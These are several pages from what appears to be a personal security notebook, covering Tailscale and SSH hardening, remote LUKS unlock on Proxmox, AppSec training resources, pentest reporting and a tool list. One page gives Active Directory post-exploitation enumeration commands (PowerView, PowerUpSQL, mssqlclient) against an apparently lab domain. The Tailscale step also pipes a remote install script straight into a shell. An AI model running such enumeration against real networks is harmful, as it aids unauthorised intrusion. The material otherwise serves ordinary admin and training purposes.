[](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#step-1-install-tailscale) STEP 1: Install TailScale 1. SSH into your server or use its console. 2. Run the TailScale install script: Copy curl -fsSL https://tailscale.com/install.sh | sh 3. Authenticate the server with your TailScale account: Copy sudo tailscale up * Open the provided URL in your browser to log in. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#step-2-enable-magicdns) STEP 2: Enable MagicDNS 1. **Log in to your TailScale Admin Console** at [login.tailscale.com](https://login.tailscale.com/) . 2. Go to **"DNS"** settings in the menu and enable **MagicDNS**. 3. With MagicDNS enabled, you can access your server via a hostname like `server-name.tailnet-name.ts.net`. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#step-3-harden-ssh-access) STEP 3: Harden SSH Access #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#a.-set-up-ssh-key-authentication) A. Set Up SSH Key Authentication 1. On your **local machine**, generate an SSH key pair (if needed): Copy ssh-keygen -t rsa -b 4096 2. Copy your **public key** to the server: Copy ssh-copy-id user@server-ip #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#b.-disable-password-authentication) B. Disable Password Authentication 1. Edit SSH config: 2. Set: 3. Restart SSH: #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#c.-change-default-ssh-port-optional) C. Change Default SSH Port (Optional) 1. In `/etc/ssh/sshd_config`, change: 2. Restart SSH: 3. Update your firewall rules (e.g., UFW): * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#step-4-install-and-configure-fail2ban) STEP 4: Install and Configure fail2ban 1. Install fail2ban: 2. Create a config file: Example config: 3. Restart fail2ban: * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#step-5-ssh-tunnel-to-access-server-web-ui-optional) STEP 5: SSH Tunnel to Access Server Web UI (Optional) To securely access a web interface (e.g., Proxmox UI) via SSH: Then open in your browser: * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#optional-restrict-ssh-to-tailscale-ips-only) (Optional) Restrict SSH to TailScale IPs Only To limit SSH access to only TailScale-connected devices: * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#summary-table) Summary Table Feature Configured? TailScale VPN ✅ Yes MagicDNS ✅ Yes SSH Key Authentication ✅ Yes Password Login Disabled ✅ Yes Custom SSH Port ✅ Yes (2222) fail2ban Protection ✅ Yes SSH Tunnel to Web UI ✅ Optional SSH Access via TailScale IP ✅ Optional [PreviousIdle Proxmox Auto-Shutdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/idle-proxmox-auto-shutdown) [NextExpose the Web UI over Tailnet](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh/expose-the-web-ui-over-tailnet) Last updated 10 months ago * [STEP 1: Install TailScale](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#step-1-install-tailscale) * [STEP 2: Enable MagicDNS](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#step-2-enable-magicdns) * [STEP 3: Harden SSH Access](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#step-3-harden-ssh-access) * [STEP 4: Install and Configure fail2ban](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#step-4-install-and-configure-fail2ban) * [STEP 5: SSH Tunnel to Access Server Web UI (Optional)](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#step-5-ssh-tunnel-to-access-server-web-ui-optional) * [(Optional) Restrict SSH to TailScale IPs Only](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#optional-restrict-ssh-to-tailscale-ips-only) * [Summary Table](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh#summary-table) Copy sudo nano /etc/ssh/sshd_config Copy PasswordAuthentication no Copy sudo systemctl restart sshd Copy Port 2222 Copy sudo systemctl restart sshd Copy sudo ufw allow 2222/tcp sudo ufw delete allow 22/tcp Copy sudo apt update sudo apt install fail2ban Copy sudo nano /etc/fail2ban/jail.local Copy [sshd] enabled = true port = 2222 logpath = /var/log/auth.log maxretry = 3 bantime = 600 findtime = 600 Copy sudo systemctl restart fail2ban Copy ssh -L 8006:localhost:8006 user@server-ip -p 2222 Copy https://localhost:8006 Copy sudo ufw allow from 100.64.0.0/10 to any port 2222 proto tcp --- # AppSec Training Pathway | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/guides/appsec-training-pathway.md) . ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/appsec-training-pathway#phase-1-foundations-of-application-security-and-pentesting) Phase 1: Foundations of Application Security and Pentesting **Objective:** To establish a strong understanding of basic security concepts, web technologies, and introductory penetration testing techniques. **1\. Understanding Basic Security Concepts** * **Resource**: [OWASP Foundation](https://owasp.org/) * **Purpose**: Introduces core security principles, common vulnerabilities (like those listed in the OWASP Top Ten), and the importance of application security. * **Topics**: Basic security principles, OWASP Top Ten, threat modeling. **2\. Introduction to Web Technologies** * **Resource**: [Mozilla Developer Network (MDN) Web Docs](https://developer.mozilla.org/en-US/) * **Purpose**: Provides comprehensive tutorials and documentation on HTML, CSS, JavaScript, and other web technologies. * **Topics**: HTML/CSS, JavaScript basics, client-server architecture. **3\. Basic Penetration Testing and Tools** * **Resource**: [TryHackMe](https://tryhackme.com/) * **Purpose**: Offers beginner-friendly modules and virtual labs to practice penetration testing skills in a safe environment. * **Topics**: Introduction to penetration testing, basic use of tools like Nmap, Wireshark. **4\. Interactive Learning and Challenges** * **Resource**: [Hack The Box](https://www.hackthebox.eu/) * **Purpose**: Provides practical hands-on experience through various real-world scenarios and challenges. * **Topics**: Basic CTF (Capture The Flag) challenges, networking basics, simple system exploits. **5\. Web Application Security Basics** * **Resource**: [PortSwigger Web Security Academy](https://portswigger.net/web-security) * **Purpose**: Detailed tutorials and labs focusing on web application vulnerabilities and their exploitation. * **Topics**: OWASP Top 10 exploitation and mitigation **Expected Outcome:** By the end of this phase, learners should have a solid understanding of basic security concepts, web technologies, and initial hands-on experience in identifying and exploiting simple vulnerabilities. ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/appsec-training-pathway#phase-2-intermediate-application-security-and-penetration-testing) Phase 2: Intermediate Application Security and Penetration Testing **Objective:** To build upon the foundational knowledge by diving deeper into more complex security vulnerabilities and advanced penetration testing techniques. **1\. Advanced Web Application Security** * **Resource**: [PortSwigger Web Security Academy](https://portswigger.net/web-security) * **Purpose**: Advanced modules focusing on complex vulnerabilities and their exploitation. * **Topics**: Advanced SQL Injection, Authentication vulnerabilities, Business logic flaws. **2\. Network Security and Penetration Testing** * **Resource**: [Hack The Box](https://www.hackthebox.eu/) * **Purpose**: Intermediate to advanced challenges that involve network exploitation and system security. * **Topics**: Network scanning and enumeration, buffer overflows, privilege escalation. **3\. Real-world Simulation and Practice** * **Resource**: [PentesterLab](https://pentesterlab.com/) * **Purpose**: Hands-on exercises and labs that mimic real-world scenarios for in-depth learning. * **Topics**: Web application attacks, Unix/Linux security, exploiting CVEs (Common Vulnerabilities and Exposures). **4\. Open Source Intelligence (OSINT)** * **Resource**: [TryHackMe](https://tryhackme.com/) * **Purpose**: Introduction to OSINT techniques and tools. * **Topics**: Information gathering, reconnaissance, using tools like Maltego. **5\. Using OWASP Vulnerable Applications for Practice** * **Resource**: [OWASP Vulnerable Web Applications Directory](https://owasp.org/www-project-vulnerable-web-applications-directory/) * **Purpose**: Practice on intentionally vulnerable web applications designed for learning and training. * **Topics**: Hands-on exploitation of various vulnerabilities, understanding the mitigation techniques. **Expected Outcome:** Learners will gain intermediate to advanced skills in web application security, network penetration testing, and will be able to handle more complex security scenarios. ### [](https://martian1337.gitbook.io/notes/training-and-career/guides/appsec-training-pathway#phase-3-advanced-application-security-and-offensive-techniques) Phase 3: Advanced Application Security and Offensive Techniques **Objective:** To master advanced offensive cybersecurity techniques, focusing on complex attack vectors, scripting for automation, and real-world scenario simulations. **1\. Advanced Exploitation Techniques** * **Resource**: [Hack The Box](https://www.hackthebox.eu/) (Harder Labs) * **Purpose**: Challenging exercises that require advanced exploitation skills. * **Topics**: Advanced system exploitation, post-exploitation techniques, pivoting and lateral movement. **2\. Scripting and Automation in Pentesting** * **Resource**: Custom Scripts (using languages like Python, Bash) * **Purpose**: Writing and utilizing scripts to automate various pentesting tasks. * **Topics**: Scripting for automation, custom exploit development, tool creation. **3\. In-Depth Application Vulnerability Analysis** * **Resource**: [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/) * **Purpose**: Comprehensive guide to testing the security of web applications. * **Topics**: In-depth testing methodologies, advanced vulnerability analysis, secure coding practices. **4\. Mobile Application Pentesting** * **Resource**: [OWASP Mobile Security Project](https://owasp.org/www-project-mobile-security/) * **Purpose**: Focuses on security in mobile applications and platforms. * **Topics**: Mobile app vulnerabilities, Android/iOS specific security issues, mobile pentesting tools. **5\. Specialization in Key Areas** * **Resource**: [PentesterLab](https://pentesterlab.com/) * **Purpose**: Provides modules for specialization like mobile security, web applications, scripting for pentesting. * **Topics**: Choose areas of specialization such as mobile security, API security, or scripting. **6\. Web Application Firewall (WAF) Bypass Techniques** * **Resource**: [PortSwigger Web Security Academy](https://portswigger.net/web-security) * **Purpose**: Learn how to identify and bypass web application firewalls. * **Topics**: WAF detection, evasion techniques, advanced bypass methods. **7\. Advanced Penetration Testing and Exploit Development** * **Resource**: [Offensive Security's Exploit Database](https://www.exploit-db.com/) * **Purpose**: To learn about the latest exploits and practice writing your own. * **Topics**: Advanced exploitation techniques, writing and customizing exploits, reverse engineering. **8\. Application Security Automation** * **Resource**: [GitHub - Awesome AppSec](https://github.com/paragonie/awesome-appsec) * **Purpose**: To learn about tools and practices for automating application security testing. * **Topics**: Static and dynamic analysis tools, integrating security into CI/CD pipelines. **9\. Cloud Security and Penetration Testing** * **Resource**: [Cloud Security Alliance (CSA)](https://cloudsecurityalliance.org/) * **Purpose**: To understand the security challenges and best practices in cloud environments. * **Topics**: Cloud infrastructure vulnerabilities, AWS/Azure/GCP security, cloud-specific attack vectors. **10\. Bug Bounty Hunting and Ethical Hacking** * **Resource**: [HackerOne](https://www.hackerone.com/) and [Bugcrowd](https://www.bugcrowd.com/) * **Purpose**: Real-world application of pentesting skills in bug bounty programs. * **Topics**: Finding and reporting vulnerabilities, responsible disclosure, building a reputation in the bug bounty community. **11\. Compliance and Reporting** * **Resource**: [OWASP Guidelines](https://owasp.org/) * **Purpose**: Understand the importance of compliance with security standards and effective reporting. * **Topics**: Security compliance (like PCI DSS, HIPAA), writing penetration test reports. **Expected Outcome:** At the end of this phase, learners will be equipped with advanced skills in application security and offensive cybersecurity, ready for real-world pentesting or red team engagements. [PreviousCybersecurity Training Topics](https://martian1337.gitbook.io/notes/training-and-career/guides/cybersecurity-training-topics) [NextResume and Interview Guide](https://martian1337.gitbook.io/notes/training-and-career/guides/interview-checklist) Last updated 1 year ago * [Phase 1: Foundations of Application Security and Pentesting](https://martian1337.gitbook.io/notes/training-and-career/guides/appsec-training-pathway#phase-1-foundations-of-application-security-and-pentesting) * [Phase 2: Intermediate Application Security and Penetration Testing](https://martian1337.gitbook.io/notes/training-and-career/guides/appsec-training-pathway#phase-2-intermediate-application-security-and-penetration-testing) * [Phase 3: Advanced Application Security and Offensive Techniques](https://martian1337.gitbook.io/notes/training-and-career/guides/appsec-training-pathway#phase-3-advanced-application-security-and-offensive-techniques) --- # Reporting | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/reporting.md) . This a guide for drafting an application assessment report #### [](https://martian1337.gitbook.io/notes/notes/reporting#introduction) Introduction * Objective * Scope * Schedule * Targets * Limitations * Findings Summary * Remediation Summary #### [](https://martian1337.gitbook.io/notes/notes/reporting#executive-summary) Executive Summary * Stick to facts * Provide an overview of the assessment's timeline, goals, and the results * Focus on High and Critical Findings * Avoid Fear, Uncertainty and Doubt (FUD) * Maximum of 1 page * Use concise bullet for most important details (optional) * Include controls that can be identified as a root cause for findings * Ensure that the audience can actually perform recommendation #### [](https://martian1337.gitbook.io/notes/notes/reporting#findings) Findings * Include description of vulnerability * Remediation Steps * Steps to reproduce PoC * List each affect path and parameter * Include screenshots, commands and code snippets * Group findings by severity * Include a checklist of controls that were tested (Best for reports minimal findings) #### [](https://martian1337.gitbook.io/notes/notes/reporting#appendices) Appendices Include an appendix for the following situations: * Documenting Authorization letters * Findings with a lot of parameters/information * Listing enumerated usernames or guessed passwords * Long command/code output * Data exfiltrated from the application during exploitation * Including key project information such as scope limitations [PreviousDomain 8: Secure Software Supply Chain](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-8-secure-software-supply-chain) [NextCommon System Task Info](https://martian1337.gitbook.io/notes/notes/common-system-task-info) Last updated 1 year ago --- # App Pentest Toolkit | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit.md) . ### [](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#web-proxy-and-scanner-tools) Web Proxy and Scanner Tools * [Burp Suite](https://portswigger.net/burp) : Industry-standard web proxy for manual and automated web application security testing. * [OWASP ZAP](https://www.zaproxy.org/) : Open-source alternative to Burp Suite for web security scanning. * [Caido](https://caido.io/) : Modern, lightweight, open-source web security auditing platform for HTTP/S traffic inspection, request modification, endpoint mapping, and collaboration. ### [](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#automated-vulnerability-scanners) Automated Vulnerability Scanners * [w3af](https://w3af.org/) : Open-source web application attack and audit framework. * [Nikto](https://github.com/sullo/nikto) : Web server scanner for finding vulnerabilities and misconfigurations. * [Skipfish](https://github.com/spinkham/skipfish) : Automated web application security scanner. ### [](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#exploitation-and-fuzzing) Exploitation and Fuzzing * [SQLMap](https://sqlmap.org/) : Automated tool for detecting and exploiting SQL injection vulnerabilities. * [WFuzz](https://github.com/xmendez/wfuzz) : Flexible web application brute-forcer for fuzzing parameters. * [Hydra](https://github.com/vanhauser-thc/thc-hydra) : Fast and flexible network login cracker with web support. * [Metasploit](https://github.com/rapid7/metasploit-framework) : Comprehensive exploitation and payload framework. * [Ratproxy](https://github.com/google/ratproxy) : Passive web application security assessment tool. ### [](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#reconnaissance-and-surface-mapping) Reconnaissance and Surface Mapping * [Nmap](https://nmap.org/) : Powerful network scanner to map attack surfaces and discover open services. * [Amass](https://github.com/owasp-amass/amass) : Advanced external asset discovery and mapping for recon. ### [](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#password-and-hash-cracking) Password and Hash Cracking * [John the Ripper](https://www.openwall.com/john/) : Widely used password cracker with broad hash support. * [Hashcat](https://hashcat.net/hashcat/) : GPU-accelerated password recovery utility. ### [](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#network-traffic-analysis) Network Traffic Analysis * [Wireshark](https://www.wireshark.org/) : Deep packet analyzer for inspecting and debugging network traffic. ### [](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#wordlists-and-payloads) Wordlists and Payloads * [SecLists](https://github.com/danielmiessler/SecLists) : Extensive collection of wordlists for fuzzing and discovery. * [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) : Curated catalog of attack payloads and exploitation cheat sheets. ### [](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#operating-systems) Operating Systems * [Kali Linux](https://www.kali.org/) : Popular Linux distro pre-installed with most major pentest tools. * [Athena OS](https://athenaos.org/) : Linux-based cybersecurity operating system, tailored for penetration testers, red teams, and researchers with a pre-packed pentesting toolkit. [PreviousPowerShell](https://martian1337.gitbook.io/notes/notes/common-system-task-info/powershell) [NextPersonal Information Removal Services](https://martian1337.gitbook.io/notes/digital-privacy/personal-information-removal-services) Last updated 5 months ago * [Web Proxy and Scanner Tools](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#web-proxy-and-scanner-tools) * [Automated Vulnerability Scanners](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#automated-vulnerability-scanners) * [Exploitation and Fuzzing](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#exploitation-and-fuzzing) * [Reconnaissance and Surface Mapping](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#reconnaissance-and-surface-mapping) * [Password and Hash Cracking](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#password-and-hash-cracking) * [Network Traffic Analysis](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#network-traffic-analysis) * [Wordlists and Payloads](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#wordlists-and-payloads) * [Operating Systems](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit#operating-systems) --- # Network Security | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/network-security.md) . [Domain Trust Enumeration](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration) [Bleeding Edge Vulnerabilities](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities) [Post-Exploitation](https://martian1337.gitbook.io/notes/notes/network-security/privileged-access) [Access Control Lists and Entries (ACL & ACE)](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace) [Credentialed Enumeration](https://martian1337.gitbook.io/notes/notes/network-security/credentialed-enumeration) [Password Attacks](https://martian1337.gitbook.io/notes/notes/network-security/password-attacks) [PowerView](https://martian1337.gitbook.io/notes/notes/network-security/powerview) [Pivoting, Tunneling and Forwarding](https://martian1337.gitbook.io/notes/notes/network-security/pivoting-tunneling-and-forwarding) [Linux Privilege Escalation](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation) [Windows Privesc](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc) [Kerberos Attacks](https://martian1337.gitbook.io/notes/notes/network-security/kerberoasting) [Pentesting JumpCloud vs Active Directory (AD) vs Azure ADDS](https://martian1337.gitbook.io/notes/notes/network-security/pentesting-jumpcloud-vs-active-directory-ad-vs-azure-adds) [PreviousPackaging and Automation of Docker Linux Apps](https://martian1337.gitbook.io/notes/notes/coding-programming/packaging-and-automation-of-docker-linux-apps) [NextDomain Trust Enumeration](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration) Last updated 1 year ago --- # Remotely Unlocking LUKS-Encrypted Proxmox with Dropbear SSH at Boot | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot.md) . [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#overview) Overview --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- When Proxmox boots with encrypted disks, the root filesystem cannot be mounted until the disk encryption passphrase is entered. The system loads an early minimal environment called **initramfs**, which does not yet have the full operating system or network services running. To remotely unlock the disk, we install **Dropbear**, a lightweight SSH server, inside this initramfs. Dropbear allows an administrator to SSH into the machine at boot time and enter the LUKS passphrase remotely. Once unlocked, the system continues booting normally. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#id-1.-copy-your-ssh-public-key-to-the-server) 1\. Copy Your SSH Public Key to the Server Copy ssh-copy-id -i /root/.ssh/id_rsa root@192.168.1.10 * This copies your SSH public key to the server's `/root/.ssh/authorized_keys`, enabling key-based authentication. * Key-based login is mandatory for security since password authentication in initramfs is disabled. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#id-2.-install-dropbear-in-initramfs) 2\. Install Dropbear in Initramfs Copy apt install dropbear-initramfs * This installs Dropbear configured to run inside the initramfs environment at boot. * Dropbear is much smaller than OpenSSH, which makes it suitable for the minimal initramfs setup. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#id-3.-configure-a-static-ip-address-for-initramfs) 3\. Configure a Static IP Address for Initramfs Edit `/etc/initramfs-tools/initramfs.conf` to specify the IP address and network settings for Dropbear during early boot. Example: * Replace `192.168.1.10` with the **same static IP address that your Proxmox host normally uses**. * This ensures the server is reachable at the same IP address during early boot (initramfs) and after full boot. * Replace `192.168.1.1` with your gateway and `enp2s0` with your actual network interface name. * The IP must match your network to enable SSH connectivity in initramfs. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#id-4.-add-your-ssh-key-to-dropbears-authorized-keys-inside-initramfs) 4\. Add Your SSH Key to Dropbear’s Authorized Keys Inside Initramfs * Dropbear uses this file to authenticate users connecting during early boot. * Proper permissions ensure Dropbear will read the keys securely. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#id-5.-rebuild-the-initramfs-and-reboot) 5\. Rebuild the Initramfs and Reboot * This regenerates the initramfs image to include Dropbear and your updated keys. * Upon reboot, Dropbear starts inside initramfs and listens for SSH connections on the static IP. _Note_: You may see error messages from cryptsetup about unresolved devices or device mismatches during boot. These are expected because the disk is still locked and will be resolved once unlocked. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#id-6.-unlock-the-encrypted-disk-via-ssh) 6\. Unlock the Encrypted Disk via SSH After reboot, connect to your server via SSH: * This command prompts for the LUKS passphrase. * Enter the disk encryption password to unlock the root filesystem. * Once unlocked, the server continues the normal boot process. * The SSH session will close automatically after unlocking. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#why-use-the-same-ip-address) Why Use the Same IP Address? * The IP configured in `initramfs.conf` must be **the same static IP that Proxmox uses after boot**, so you can reach the server consistently before and after disk unlocking. * If the IP differs, you must remember and connect to a separate address during early boot, which complicates management. * Using the same IP minimizes network confusion and prevents failures where Dropbear is unreachable because of misconfigured networking in initramfs. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#important-notes) Important Notes * Ensure the network interface name and IP subnet configurations are correct and valid on your network. Incorrect settings cause Dropbear SSH to be unreachable. * This method requires that the network is fully operational inside initramfs, which depends on correct static IP configuration. * For emergency access, consider alternate recovery options if network unlock fails. * Always secure your authorized SSH keys to maintain security during early boot. This setup enables secure, seamless remote disk unlocking for encrypted Proxmox systems, improving convenience without sacrificing security. [PreviousEnable and test Wake-on-LAN (WOL)](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol) [NextIdle Proxmox Auto-Shutdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/idle-proxmox-auto-shutdown) Last updated 10 months ago * [Overview](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#overview) * [1\. Copy Your SSH Public Key to the Server](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#id-1.-copy-your-ssh-public-key-to-the-server) * [2\. Install Dropbear in Initramfs](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#id-2.-install-dropbear-in-initramfs) * [3\. Configure a Static IP Address for Initramfs](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#id-3.-configure-a-static-ip-address-for-initramfs) * [4\. Add Your SSH Key to Dropbear’s Authorized Keys Inside Initramfs](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#id-4.-add-your-ssh-key-to-dropbears-authorized-keys-inside-initramfs) * [5\. Rebuild the Initramfs and Reboot](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#id-5.-rebuild-the-initramfs-and-reboot) * [6\. Unlock the Encrypted Disk via SSH](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#id-6.-unlock-the-encrypted-disk-via-ssh) * [Why Use the Same IP Address?](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#why-use-the-same-ip-address) * [Important Notes](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot#important-notes) Copy cat << 'EOF' >> /etc/initramfs-tools/initramfs.conf IP=192.168.1.10::192.168.1.1:255.255.255.0::enp2s0:off EOF Copy cp /root/.ssh/authorized_keys /etc/dropbear/initramfs/authorized_keys chmod 600 /etc/dropbear/initramfs/authorized_keys Copy update-initramfs -u reboot Copy ssh root@192.168.1.10 cryptroot-unlock --- # Container Security | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/container-security.md) . Kubernetes [Kubeeye - misconfiguration scanning tool](https://github.com/kubesphere/kubeeye) [PreviousMobile Pentesting](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/mobile-pentesting) [NextBlockchain](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/blockchain) Last updated 1 year ago --- # Post-Exploitation | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/network-security/privileged-access.md) . ### [](https://martian1337.gitbook.io/notes/notes/network-security/privileged-access#enumerate-rdp-users-group) Enumerate RDP Users Group Copy Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users" ### [](https://martian1337.gitbook.io/notes/notes/network-security/privileged-access#enumerate-winrm-group) Enumerate WinRM Group Copy Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users" ### [](https://martian1337.gitbook.io/notes/notes/network-security/privileged-access#sql-server) SQL Server Copy # Import Module Import-Module .\PowerUpSQL.ps1 # Enumerate SQL Instance Get-SQLInstanceDomain # mssqlcient mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth [PreviousBleeding Edge Vulnerabilities](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities) [NextAccess Control Lists and Entries (ACL & ACE)](https://martian1337.gitbook.io/notes/notes/network-security/access-control-lists-and-entries-acl-and-ace) Last updated 1 year ago * [Enumerate RDP Users Group](https://martian1337.gitbook.io/notes/notes/network-security/privileged-access#enumerate-rdp-users-group) * [Enumerate WinRM Group](https://martian1337.gitbook.io/notes/notes/network-security/privileged-access#enumerate-winrm-group) * [SQL Server](https://martian1337.gitbook.io/notes/notes/network-security/privileged-access#sql-server) --- # Reverse Engineering Checklist | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist.md) . ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#initial-setup) **Initial Setup** * Set up a safe and controlled environment for analysis (preferably a virtual machine). * Install necessary tools such as disassemblers (IDA Pro, Ghidra), debuggers (GDB, x64dbg), and hex editors. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist#file-analysis) **File Analysis:** * Check the file type (e.g., `file` command in Linux). * Scan for viruses or malicious content using tools like 